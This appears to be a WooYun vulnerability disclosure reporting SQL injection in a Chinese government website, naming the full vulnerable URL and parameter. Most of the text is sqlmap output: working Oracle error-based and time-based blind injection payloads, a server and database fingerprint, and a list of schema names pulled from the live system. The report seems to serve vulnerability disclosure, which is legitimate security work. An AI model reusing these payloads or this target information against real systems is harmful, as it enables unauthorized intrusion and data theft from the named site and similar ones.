WooYun.org

挺多注入点，其中一个：http://hlbers.gov.cn/VIPCompanyDetail.aspx?cid=hu279yrcj83112%27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: cid=hu279yrcj83112' AND 8064=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(
110)||CHR(115)||CHR(121)||CHR(113)||(SELECT (CASE WHEN (8064=8064) THEN 1 ELSE 0 END) FROM DUAL)
||CHR(113)||CHR(117)||CHR(99)||CHR(104)||CHR(113)||CHR(62))) FROM DUAL) AND 'OVuk'='OVuk
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cid=hu279yrcj83112' AND 5589=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(68)||CHR(112)|
|CHR(120),5) AND 'ORKc'='ORKc
---
[09:46:45] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:46:45] [WARNING] schema names are going to be used on Oracle for enumeration as the counterp
art to database names on other DBMSes
[09:46:45] [INFO] fetching database (schema) names
[09:46:48] [INFO] the SQL query used returns 22 entries
[09:46:49] [INFO] retrieved: CTXSYS
[09:46:50] [INFO] retrieved: DBSNMP
[09:46:51] [INFO] retrieved: DMSYS
[09:46:52] [INFO] retrieved: EXFSYS
[09:46:53] [INFO] retrieved: HLBRSJOB
[09:46:57] [INFO] retrieved: HR
[09:46:58] [INFO] retrieved: IX
[09:46:59] [INFO] retrieved: MDSYS
[09:47:00] [WARNING] user aborted during enumeration. sqlmap will display partial output
available databases [8]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HLBRSJOB
[*] HR
[*] IX
[*] MDSYS
[09:47:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 9 times
[09:47:00] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output
\hlbers.gov.cn'
[*] shutting down at 09:47:00